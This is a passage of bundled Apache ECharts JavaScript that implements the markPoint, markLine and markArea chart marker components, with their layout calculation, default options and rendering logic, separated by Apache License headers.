mpData.getItemModel(idx);\n        var point;\n        var xPx = parsePercent$1(itemModel.get('x'), api.getWidth());\n        var yPx = parsePercent$1(itemModel.get('y'), api.getHeight());\n        if (!isNaN(xPx) && !isNaN(yPx)) {\n            point = [xPx, yPx];\n        }\n        // Chart like bar may have there own marker positioning logic\n        else if (seriesModel.getMarkerPosition) {\n            // Use the getMarkerPoisition\n            point = seriesModel.getMarkerPosition(\n                mpData.getValues(mpData.dimensions, idx)\n            );\n        }\n        else if (coordSys) {\n            var x = mpData.get(coordSys.dimensions[0], idx);\n            var y = mpData.get(coordSys.dimensions[1], idx);\n            point = coordSys.dataToPoint([x, y]);\n\n        }\n\n        // Use x, y if has any\n        if (!isNaN(xPx)) {\n            point[0] = xPx;\n        }\n        if (!isNaN(yPx)) {\n            point[1] = yPx;\n        }\n\n        mpData.setItemLayout(idx, point);\n    });\n}\n\nMarkerView.extend({\n\n    type: 'markPoint',\n\n    // updateLayout: function (markPointModel, ecModel, api) {\n    //     ecModel.eachSeries(function (seriesModel) {\n    //         var mpModel = seriesModel.markPointModel;\n    //         if (mpModel) {\n    //             updateMarkerLayout(mpModel.getData(), seriesModel, api);\n    //             this.markerGroupMap.get(seriesModel.id).updateLayout(mpModel);\n    //         }\n    //     }, this);\n    // },\n\n    updateTransform: function (markPointModel, ecModel, api) {\n        ecModel.eachSeries(function (seriesModel) {\n            var mpModel = seriesModel.markPointModel;\n            if (mpModel) {\n                updateMarkerLayout(mpModel.getData(), seriesModel, api);\n                this.markerGroupMap.get(seriesModel.id).updateLayout(mpModel);\n            }\n        }, this);\n    },\n\n    renderSeries: function (seriesModel, mpModel, ecModel, api) {\n        var coordSys = seriesModel.coordinateSystem;\n        var seriesId = seriesModel.id;\n        var seriesData = seriesModel.getData();\n\n        var symbolDrawMap = this.markerGroupMap;\n        var symbolDraw = symbolDrawMap.get(seriesId)\n            || symbolDrawMap.set(seriesId, new SymbolDraw());\n\n        var mpData = createList$1(coordSys, seriesModel, mpModel);\n\n        // FIXME\n        mpModel.setData(mpData);\n\n        updateMarkerLayout(mpModel.getData(), seriesModel, api);\n\n        mpData.each(function (idx) {\n            var itemModel = mpData.getItemModel(idx);\n            var symbol = itemModel.getShallow('symbol');\n            var symbolSize = itemModel.getShallow('symbolSize');\n            var isFnSymbol = isFunction$1(symbol);\n            var isFnSymbolSize = isFunction$1(symbolSize);\n\n            if (isFnSymbol || isFnSymbolSize) {\n                var rawIdx = mpModel.getRawValue(idx);\n                var dataParams = mpModel.getDataParams(idx);\n                if (isFnSymbol) {\n                    symbol = symbol(rawIdx, dataParams);\n                }\n                if (isFnSymbolSize) {\n                    // FIXME 这里不兼容 ECharts 2.x，2.x 貌似参数是整个数据？\n                    symbolSize = symbolSize(rawIdx, dataParams);\n                }\n            }\n\n            mpData.setItemVisual(idx, {\n                symbol: symbol,\n                symbolSize: symbolSize,\n                color: itemModel.get('itemStyle.color')\n                    || seriesData.getVisual('color')\n            });\n        });\n\n        // TODO Text are wrong\n        symbolDraw.updateData(mpData);\n        this.group.add(symbolDraw.group);\n\n        // Set host model for tooltip\n        // FIXME\n        mpData.eachItemGraphicEl(function (el) {\n            el.traverse(function (child) {\n                child.dataModel = mpModel;\n            });\n        });\n\n        symbolDraw.__keep = true;\n\n        symbolDraw.group.silent = mpModel.get('silent') || seriesModel.get('silent');\n    }\n});\n\n/**\n * @inner\n * @param {module:echarts/coord/*} [coordSys]\n * @param {module:echarts/model/Series} seriesModel\n * @param {module:echarts/model/Model} mpModel\n */\nfunction createList$1(coordSys, seriesModel, mpModel) {\n    var coordDimsInfos;\n    if (coordSys) {\n        coordDimsInfos = map(coordSys && coordSys.dimensions, function (coordDim) {\n            var info = seriesModel.getData().getDimensionInfo(\n                seriesModel.getData().mapDimension(coordDim)\n            ) || {};\n            // In map series data don't have lng and lat dimension. Fallback to same with coordSys\n            return defaults({name: coordDim}, info);\n        });\n    }\n    else {\n        coordDimsInfos = [{\n            name: 'value',\n            type: 'float'\n        }];\n    }\n\n    var mpData = new List(coordDimsInfos, mpModel);\n    var dataOpt = map(mpModel.get('data'), curry(\n            dataTransform, seriesModel\n        ));\n    if (coordSys) {\n        dataOpt = filter(\n            dataOpt, curry(dataFilter$1, coordSys)\n        );\n    }\n\n    mpData.initData(dataOpt, null,\n        coordSys ? dimValueGetter : function (item) {\n            return item.value;\n        }\n    );\n\n    return mpData;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// HINT Markpoint can't be used too much\nregisterPreprocessor(function (opt) {\n    // Make sure markPoint component is enabled\n    opt.markPoint = opt.markPoint || {};\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nMarkerModel.extend({\n\n    type: 'markLine',\n\n    defaultOption: {\n        zlevel: 0,\n        z: 5,\n\n        symbol: ['circle', 'arrow'],\n        symbolSize: [8, 16],\n\n        //symbolRotate: 0,\n\n        precision: 2,\n        tooltip: {\n            trigger: 'item'\n        },\n        label: {\n            show: true,\n            position: 'end',\n            distance: 5\n        },\n        lineStyle: {\n            type: 'dashed'\n        },\n        emphasis: {\n            label: {\n                show: true\n            },\n            lineStyle: {\n                width: 3\n            }\n        },\n        animationEasing: 'linear'\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar markLineTransform = function (seriesModel, coordSys, mlModel, item) {\n    var data = seriesModel.getData();\n    // Special type markLine like 'min', 'max', 'average', 'median'\n    var mlType = item.type;\n\n    if (!isArray(item)\n        && (\n            mlType === 'min' || mlType === 'max' || mlType === 'average' || mlType === 'median'\n            // In case\n            // data: [{\n            //   yAxis: 10\n            // }]\n            || (item.xAxis != null || item.yAxis != null)\n        )\n    ) {\n        var valueAxis;\n        var value;\n\n        if (item.yAxis != null || item.xAxis != null) {\n            valueAxis = coordSys.getAxis(item.yAxis != null ? 'y' : 'x');\n            value = retrieve(item.yAxis, item.xAxis);\n        }\n        else {\n            var axisInfo = getAxisInfo$1(item, data, coordSys, seriesModel);\n            valueAxis = axisInfo.valueAxis;\n            var valueDataDim = getStackedDimension(data, axisInfo.valueDataDim);\n            value = numCalculate(data, valueDataDim, mlType);\n        }\n        var valueIndex = valueAxis.dim === 'x' ? 0 : 1;\n        var baseIndex = 1 - valueIndex;\n\n        var mlFrom = clone(item);\n        var mlTo = {};\n\n        mlFrom.type = null;\n\n        mlFrom.coord = [];\n        mlTo.coord = [];\n        mlFrom.coord[baseIndex] = -Infinity;\n        mlTo.coord[baseIndex] = Infinity;\n\n        var precision = mlModel.get('precision');\n        if (precision >= 0 && typeof value === 'number') {\n            value = +value.toFixed(Math.min(precision, 20));\n        }\n\n        mlFrom.coord[valueIndex] = mlTo.coord[valueIndex] = value;\n\n        item = [mlFrom, mlTo, { // Extra option for tooltip and label\n            type: mlType,\n            valueIndex: item.valueIndex,\n            // Force to use the value of calculated value.\n            value: value\n        }];\n    }\n\n    item = [\n        dataTransform(seriesModel, item[0]),\n        dataTransform(seriesModel, item[1]),\n        extend({}, item[2])\n    ];\n\n    // Avoid line data type is extended by from(to) data type\n    item[2].type = item[2].type || '';\n\n    // Merge from option and to option into line option\n    merge(item[2], item[0]);\n    merge(item[2], item[1]);\n\n    return item;\n};\n\nfunction isInifinity(val) {\n    return !isNaN(val) && !isFinite(val);\n}\n\n// If a markLine has one dim\nfunction ifMarkLineHasOnlyDim(dimIndex, fromCoord, toCoord, coordSys) {\n    var otherDimIndex = 1 - dimIndex;\n    var dimName = coordSys.dimensions[dimIndex];\n    return isInifinity(fromCoord[otherDimIndex]) && isInifinity(toCoord[otherDimIndex])\n        && fromCoord[dimIndex] === toCoord[dimIndex] && coordSys.getAxis(dimName).containData(fromCoord[dimIndex]);\n}\n\nfunction markLineFilter(coordSys, item) {\n    if (coordSys.type === 'cartesian2d') {\n        var fromCoord = item[0].coord;\n        var toCoord = item[1].coord;\n        // In case\n        // {\n        //  markLine: {\n        //    data: [{ yAxis: 2 }]\n        //  }\n        // }\n        if (\n            fromCoord && toCoord\n            && (ifMarkLineHasOnlyDim(1, fromCoord, toCoord, coordSys)\n            || ifMarkLineHasOnlyDim(0, fromCoord, toCoord, coordSys))\n        ) {\n            return true;\n        }\n    }\n    return dataFilter$1(coordSys, item[0])\n        && dataFilter$1(coordSys, item[1]);\n}\n\nfunction updateSingleMarkerEndLayout(\n    data, idx, isFrom, seriesModel, api\n) {\n    var coordSys = seriesModel.coordinateSystem;\n    var itemModel = data.getItemModel(idx);\n\n    var point;\n    var xPx = parsePercent$1(itemModel.get('x'), api.getWidth());\n    var yPx = parsePercent$1(itemModel.get('y'), api.getHeight());\n    if (!isNaN(xPx) && !isNaN(yPx)) {\n        point = [xPx, yPx];\n    }\n    else {\n        // Chart like bar may have there own marker positioning logic\n        if (seriesModel.getMarkerPosition) {\n            // Use the getMarkerPoisition\n            point = seriesModel.getMarkerPosition(\n                data.getValues(data.dimensions, idx)\n            );\n        }\n        else {\n            var dims = coordSys.dimensions;\n            var x = data.get(dims[0], idx);\n            var y = data.get(dims[1], idx);\n            point = coordSys.dataToPoint([x, y]);\n        }\n        // Expand line to the edge of grid if value on one axis is Inifnity\n        // In case\n        //  markLine: {\n        //    data: [{\n        //      yAxis: 2\n        //      // or\n        //      type: 'average'\n        //    }]\n        //  }\n        if (coordSys.type === 'cartesian2d') {\n            var xAxis = coordSys.getAxis('x');\n            var yAxis = coordSys.getAxis('y');\n            var dims = coordSys.dimensions;\n            if (isInifinity(data.get(dims[0], idx))) {\n                point[0] = xAxis.toGlobalCoord(xAxis.getExtent()[isFrom ? 0 : 1]);\n            }\n            else if (isInifinity(data.get(dims[1], idx))) {\n                point[1] = yAxis.toGlobalCoord(yAxis.getExtent()[isFrom ? 0 : 1]);\n            }\n        }\n\n        // Use x, y if has any\n        if (!isNaN(xPx)) {\n            point[0] = xPx;\n        }\n        if (!isNaN(yPx)) {\n            point[1] = yPx;\n        }\n    }\n\n    data.setItemLayout(idx, point);\n}\n\nMarkerView.extend({\n\n    type: 'markLine',\n\n    // updateLayout: function (markLineModel, ecModel, api) {\n    //     ecModel.eachSeries(function (seriesModel) {\n    //         var mlModel = seriesModel.markLineModel;\n    //         if (mlModel) {\n    //             var mlData = mlModel.getData();\n    //             var fromData = mlModel.__from;\n    //             var toData = mlModel.__to;\n    //             // Update visual and layout of from symbol and to symbol\n    //             fromData.each(function (idx) {\n    //                 updateSingleMarkerEndLayout(fromData, idx, true, seriesModel, api);\n    //                 updateSingleMarkerEndLayout(toData, idx, false, seriesModel, api);\n    //             });\n    //             // Update layout of line\n    //             mlData.each(function (idx) {\n    //                 mlData.setItemLayout(idx, [\n    //                     fromData.getItemLayout(idx),\n    //                     toData.getItemLayout(idx)\n    //                 ]);\n    //             });\n\n    //             this.markerGroupMap.get(seriesModel.id).updateLayout();\n\n    //         }\n    //     }, this);\n    // },\n\n    updateTransform: function (markLineModel, ecModel, api) {\n        ecModel.eachSeries(function (seriesModel) {\n            var mlModel = seriesModel.markLineModel;\n            if (mlModel) {\n                var mlData = mlModel.getData();\n                var fromData = mlModel.__from;\n                var toData = mlModel.__to;\n                // Update visual and layout of from symbol and to symbol\n                fromData.each(function (idx) {\n                    updateSingleMarkerEndLayout(fromData, idx, true, seriesModel, api);\n                    updateSingleMarkerEndLayout(toData, idx, false, seriesModel, api);\n                });\n                // Update layout of line\n                mlData.each(function (idx) {\n                    mlData.setItemLayout(idx, [\n                        fromData.getItemLayout(idx),\n                        toData.getItemLayout(idx)\n                    ]);\n                });\n\n                this.markerGroupMap.get(seriesModel.id).updateLayout();\n\n            }\n        }, this);\n    },\n\n    renderSeries: function (seriesModel, mlModel, ecModel, api) {\n        var coordSys = seriesModel.coordinateSystem;\n        var seriesId = seriesModel.id;\n        var seriesData = seriesModel.getData();\n\n        var lineDrawMap = this.markerGroupMap;\n        var lineDraw = lineDrawMap.get(seriesId)\n            || lineDrawMap.set(seriesId, new LineDraw());\n        this.group.add(lineDraw.group);\n\n        var mlData = createList$2(coordSys, seriesModel, mlModel);\n\n        var fromData = mlData.from;\n        var toData = mlData.to;\n        var lineData = mlData.line;\n\n        mlModel.__from = fromData;\n        mlModel.__to = toData;\n        // Line data for tooltip and formatter\n        mlModel.setData(lineData);\n\n        var symbolType = mlModel.get('symbol');\n        var symbolSize = mlModel.get('symbolSize');\n        if (!isArray(symbolType)) {\n            symbolType = [symbolType, symbolType];\n        }\n        if (typeof symbolSize === 'number') {\n            symbolSize = [symbolSize, symbolSize];\n        }\n\n        // Update visual and layout of from symbol and to symbol\n        mlData.from.each(function (idx) {\n            updateDataVisualAndLayout(fromData, idx, true);\n            updateDataVisualAndLayout(toData, idx, false);\n        });\n\n        // Update visual and layout of line\n        lineData.each(function (idx) {\n            var lineColor = lineData.getItemModel(idx).get('lineStyle.color');\n            lineData.setItemVisual(idx, {\n                color: lineColor || fromData.getItemVisual(idx, 'color')\n            });\n            lineData.setItemLayout(idx, [\n                fromData.getItemLayout(idx),\n                toData.getItemLayout(idx)\n            ]);\n\n            lineData.setItemVisual(idx, {\n                'fromSymbolSize': fromData.getItemVisual(idx, 'symbolSize'),\n                'fromSymbol': fromData.getItemVisual(idx, 'symbol'),\n                'toSymbolSize': toData.getItemVisual(idx, 'symbolSize'),\n                'toSymbol': toData.getItemVisual(idx, 'symbol')\n            });\n        });\n\n        lineDraw.updateData(lineData);\n\n        // Set host model for tooltip\n        // FIXME\n        mlData.line.eachItemGraphicEl(function (el, idx) {\n            el.traverse(function (child) {\n                child.dataModel = mlModel;\n            });\n        });\n\n        function updateDataVisualAndLayout(data, idx, isFrom) {\n            var itemModel = data.getItemModel(idx);\n\n            updateSingleMarkerEndLayout(\n                data, idx, isFrom, seriesModel, api\n            );\n\n            data.setItemVisual(idx, {\n                symbolSize: itemModel.get('symbolSize') || symbolSize[isFrom ? 0 : 1],\n                symbol: itemModel.get('symbol', true) || symbolType[isFrom ? 0 : 1],\n                color: itemModel.get('itemStyle.color') || seriesData.getVisual('color')\n            });\n        }\n\n        lineDraw.__keep = true;\n\n        lineDraw.group.silent = mlModel.get('silent') || seriesModel.get('silent');\n    }\n});\n\n/**\n * @inner\n * @param {module:echarts/coord/*} coordSys\n * @param {module:echarts/model/Series} seriesModel\n * @param {module:echarts/model/Model} mpModel\n */\nfunction createList$2(coordSys, seriesModel, mlModel) {\n\n    var coordDimsInfos;\n    if (coordSys) {\n        coordDimsInfos = map(coordSys && coordSys.dimensions, function (coordDim) {\n            var info = seriesModel.getData().getDimensionInfo(\n                seriesModel.getData().mapDimension(coordDim)\n            ) || {};\n            // In map series data don't have lng and lat dimension. Fallback to same with coordSys\n            return defaults({name: coordDim}, info);\n        });\n    }\n    else {\n        coordDimsInfos = [{\n            name: 'value',\n            type: 'float'\n        }];\n    }\n\n    var fromData = new List(coordDimsInfos, mlModel);\n    var toData = new List(coordDimsInfos, mlModel);\n    // No dimensions\n    var lineData = new List([], mlModel);\n\n    var optData = map(mlModel.get('data'), curry(\n        markLineTransform, seriesModel, coordSys, mlModel\n    ));\n    if (coordSys) {\n        optData = filter(\n            optData, curry(markLineFilter, coordSys)\n        );\n    }\n    var dimValueGetter$$1 = coordSys ? dimValueGetter : function (item) {\n        return item.value;\n    };\n    fromData.initData(\n        map(optData, function (item) {\n            return item[0];\n        }),\n        null,\n        dimValueGetter$$1\n    );\n    toData.initData(\n        map(optData, function (item) {\n            return item[1];\n        }),\n        null,\n        dimValueGetter$$1\n    );\n    lineData.initData(\n        map(optData, function (item) {\n            return item[2];\n        })\n    );\n    lineData.hasItemOption = true;\n\n    return {\n        from: fromData,\n        to: toData,\n        line: lineData\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterPreprocessor(function (opt) {\n    // Make sure markLine component is enabled\n    opt.markLine = opt.markLine || {};\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nMarkerModel.extend({\n\n    type: 'markArea',\n\n    defaultOption: {\n        zlevel: 0,\n        // PENDING\n        z: 1,\n        tooltip: {\n            trigger: 'item'\n        },\n        // markArea should fixed on the coordinate system\n        animation: false,\n        label: {\n            show: true,\n            position: 'top'\n        },\n        itemStyle: {\n            // color and borderColor default to use color from series\n            // color: 'auto'\n            // borderColor: 'auto'\n            borderWidth: 0\n        },\n\n        emphasis: {\n            label: {\n                show: true,\n                position: 'top'\n            }\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// TODO Better on polar\n\nvar markAreaTransform = function (seriesModel, coordSys, maModel, item) {\n    var lt = dataTransform(seriesModel, item[0]);\n    var rb = dataTransform(seriesModel, item[1]);\n    var retrieve$$1 = retrieve;\n\n    // FIXME make sure lt is less than rb\n    var ltCoord = lt.coord;\n    var rbCoord = rb.coord;\n    ltCoord[0] = retrieve$$1(ltCoord[0], -Infinity);\n    ltCoord[1] = retrieve$$1(ltCoord[1], -Infinity);\n\n    rbCoord[0] = retrieve$$1(rbCoord[0], Infinity);\n    rbCoord[1] = retrieve$$1(rbCoord[1], Infinity);\n\n    // Merge option into one\n    var result = mergeAll([{}, lt, rb]);\n\n    result.coord = [\n        lt.coord, rb.coord\n    ];\n    result.x0 = lt.x;\n    result.y0 = lt.y;\n    result.x1 = rb.x;\n    result.y1 = rb.y;\n    return result;\n};\n\nfunction isInifinity$1(val) {\n    return !isNaN(val) && !isFinite(val);\n}\n\n// If a markArea has one dim\nfunction ifMarkLineHasOnlyDim$1(dimIndex, fromCoord, toCoord, coordSys) {\n    var otherDimIndex = 1 - dimIndex;\n    return isInifinity$1(fromCoord[otherDimIndex]) && isInifinity$1(toCoord[otherDimIndex]);\n}\n\nfunction markAreaFilter(coordSys, item) {\n    var fromCoord = item.coord[0];\n    var toCoord = item.coord[1];\n    if (coordSys.type === 'cartesian2d') {\n        // In case\n        // {\n        //  markArea: {\n        //    data: [{ yAxis: 2 }]\n        //  }\n        // }\n        if (\n            fromCoord && toCoord\n            && (ifMarkLineHasOnlyDim$1(1, fromCoord, toCoord, coordSys)\n            || ifMarkLineHasOnlyDim$1(0, fromCoord, toCoord, coordSys))\n        ) {\n            return true;\n        }\n    }\n    return dataFilter$1(coordSys, {\n            coord: fromCoord,\n            x: item.x0,\n            y: item.y0\n        })\n        || dataFilter$1(coordSys, {\n            coord: toCoord,\n            x: item.x1,\n            y: item.y1\n        });\n}\n\n// dims can be ['x0', 'y0'], ['x1', 'y1'], ['x0', 'y1'], ['x1', 'y0']\nfunction getSingleMarkerEndPoint(data, idx, dims, seriesModel, api) {\n    var coordSys = seriesModel.coordinateSystem;\n    var itemModel = data.getItemModel(idx);\n\n    var point;\n    var xPx = parsePercent$1(itemModel.get(dims[0]), api.getWidth());\n    var yPx = parsePercent$1(itemModel.get(dims[1]), api.getHeight());\n    if (!isNaN(xPx) && !isNaN(yPx)) {\n        point = [xPx, yPx];\n    }\n    else {\n        // Chart like bar may have there own marker positioning logic\n        if (seriesModel.getMarkerPosition) {\n            // Use the getMarkerPoisition\n            point = seriesModel.getMarkerPosition(\n                data.getValues(dims, idx)\n            );\n        }\n        else {\n            var x = data.get(dims[0], idx);\n            var y = data.get(dims[1], idx);\n            var pt = [x, y];\n            coordSys.clampData && coordSys.clampData(pt, pt);\n            point = coordSys.dataToPoint(pt, true);\n        }\n        if (coordSys.type === 'cartesian2d') {\n            var xAxis = coordSys.getAxis('x');\n            var yAxis = coordSys.getAxis('y');\n            var x = data.get(dims[0], idx);\n            var y = data.get(dims[1], idx);\n            if (isInifinity$1(x)) {\n                point[0] = xAxis.toGlobalCoord(xAxis.getExtent()[dims[0] === 'x0' ? 0 : 1]);\n            }\n            else if (isInifinity$1(y)) {\n                point[1] = yAxis.toGlobalCoord(yAxis.getExtent()[dims[1] === 'y0' ? 0 : 1]);\n            }\n        }\n\n        // Use x, y if has any\n        if (!isNaN(xPx)) {\n            point[0] = xPx;\n        }\n        if (!isNaN(yPx)) {\n            point[1] = yPx;\n        }\n    }\n\n    return point;\n}\n\nvar dimPermutations = [['x0', 'y0'], ['x1', 'y0'], ['x1', 'y1'], ['x0', 'y1']];\n\nMarkerView.extend({\n\n    type: 'markArea',\n\n    // updateLayout: function (markAreaModel, ecModel, api) {\n    //     ecModel.eachSeries(function (seriesModel) {\n    //         var maModel = seriesModel.markAreaModel;\n    //         if (maModel) {\n    //             var areaData = maModel.getData();\n    //             areaData.each(function (idx) {\n    //                 var points = zrUtil.map(dimPermutations, function (dim) {\n    //                     return getSingleMarkerEndPoint(areaData, idx, dim, seriesModel, api);\n    //                 });\n    //                 // Layout\n    //                 areaData.setItemLayout(idx, points);\n    //                 var el = areaData.getItemGraphicEl(idx);\n    //                 el.setShape('points', points);\n    //             });\n    //         }\n    //     }, this);\n    // },\n\n    updateTransform: function (markAreaModel, ecModel, api) {\n        ecModel.eachSeries(function (seriesModel) {\n            var maModel = seriesModel.markAreaModel;\n            if (maModel) {\n                var areaData = maModel.getData();\n                areaData.each(function (idx) {\n                    var points = map(dimPermutations, function (dim) {\n                        return getSingleMarkerEndPoint(areaData, idx, dim, seriesModel, api);\n                    });\n                    // Layout\n                    areaData.setItemLayout(idx, points);\n                    var el = areaData.getItemGraphicEl(idx);\n                    el.setShape('points', points);\n                });\n            }\n        }, this);\n    },\n\n    renderSeries: function (seriesModel, maModel, ecModel, api) {\n        var coordSys = seriesModel.coordinateSystem;\n        var seriesId = seriesModel.id;\n        var seriesData = seriesModel.getData();\n\n        var areaGroupMap = this.markerGroupMap;\n        var polygonGroup = areaGroupMap.get(seriesId)\n            || areaGroupMap.set(seriesId, {group: new Group()});\n\n        this.group.add(polygonGroup.group);\n        polygonGroup.__keep = true;\n\n        var areaData = createList$3(coordSys, seriesModel, maModel);\n\n        // Line data for tooltip and formatter\n        maModel.setData(areaData);\n\n        // Update visual and layout of line\n        areaData.each(function (idx) {\n            // Layout\n            areaData.setItemLayout(idx, map(dimPermutations, function (dim) {\n                return getSingleMarkerEndPoint(areaData, idx, dim, seriesModel, api);\n            }));\n\n            // Visual\n            areaData.setItemVisual(idx, {\n                color: seriesData.getVisual('color')\n            });\n        });\n\n\n        areaData.diff(polygonGroup.__data)\n            .add(function (idx) {\n                var polygon = new Polygon({\n                    shape: {\n                        points: areaData.getItemLayout(idx)\n                    }\n                });\n                areaData.setItemGraphicEl(idx, polygon);\n                polygonGroup.group.add(polygon);\n            })\n            .update(function (newIdx, oldIdx) {\n                var polygon = polygonGroup.__data.getItemGraphicEl(oldIdx);\n                updateProps(polygon, {\n                    shape: {\n                        points: areaData.getItemLayout(newIdx)\n                    }\n                }, maModel, newIdx);\n                polygonGroup.group.add(polygon);\n                areaData.setItemGraphicEl(newIdx, polygon);\n            })\n            .remove(function (idx) {\n                var polygon = polygonGroup.__data.getItemGraphicEl(idx);\n                polygonGroup.group.remove(polygon);\n            })\n            .execute();\n\n        areaData.eachItemGraphicEl(function (polygon, idx) {\n            var itemModel = areaData.getItemModel(idx);\n            var labelModel = itemModel.getModel('label');\n            var labelHoverModel = itemModel.getModel('emphasis.label');\n            var color = areaData.getItemVisual(idx, 'color');\n            polygon.useStyle(\n                defaults(\n                    itemModel.getModel('itemStyle').getItemStyle(),\n                    {\n                        fill: modifyAlpha(color, 0.4),\n                        stroke: color\n                    }\n                )\n            );\n\n            polygon.hoverStyle = itemModel.getModel('emphasis.itemStyle').getItemStyle();\n\n            setLabelStyle(\n                polygon.style, polygon.hoverStyle, labelModel, labelHoverModel,\n                {\n                    labelFetcher: maModel,\n                    labelDataIndex: idx,\n                    defaultText: areaData.getName(idx) || '',\n                    isRectText: true,\n                    autoColor: color\n                }\n            );\n\n            setHoverStyle(polygon, {});\n\n            polygon.dataModel = maModel;\n        });\n\n        polygonGroup.__data = areaData;\n\n        polygonGroup.group.silent = maModel.get('silent') || seriesModel.get('silent');\n    }\n});\n\n/**\n * @inner\n * @param {module:echarts/coord/*} coordSys\n * @param {module:echarts/model/Series} seriesModel\n * @param {module:echarts/model/Model} mpModel\n */\nfunction createList$3(coordSys, seriesModel, maModel) {\n\n    var coordDimsInfos;\n    var areaData;\n    var dims = ['x0', 'y0', 'x1', 'y1'];\n    if (coordSys) {\n        coordDimsInfos = map(coordSys && coordSys.dimensions, function (coordDim) {\n            var data = seriesModel.getData();\n            var info = data.getDimensionInfo(\n                data.mapDimension(coordDim)\n            ) || {};\n            // In map series data don't have lng and lat dimension. Fallback to same with coordSys\n            return defaults({name: coordDim}, info);\n        });\n        areaData = new List(map(dims, function (dim, idx) {\n            return {\n                name: dim,\n                type: coordDimsInfos[idx % 2].type\n            };\n        }), maModel);\n    }\n    else {\n        coordDimsInfos = [{\n            name: 'value',\n            type: 'float'\n        }];\n        areaData = new List(coordDimsInfos, maModel);\n    }\n\n    var optData = map(maModel.get('data'), curry(\n        markAreaTransform, seriesModel, coordSys, maModel\n    ));\n    if (coordSys) {\n        optData = filter(\n            optData, curry(markAreaFilter, coordSys)\n        );\n    }\n\n    var dimValueGetter$$1 = coordSys ? function (item, dimName, dataIndex, dimIndex) {\n        return item.coord[Math.floor(dimIndex / 2)][dimIndex % 2];\n    } : function (item) {\n        return item.value;\n    };\n    areaData.initData(optData, null, dimValueGetter$$1);\n    areaData.hasItemOption = true;\n    return areaData;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterPreprocessor(function (opt) {\n    // Make sure markArea component is enabled\n    opt.markArea = opt.markArea || {};\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES 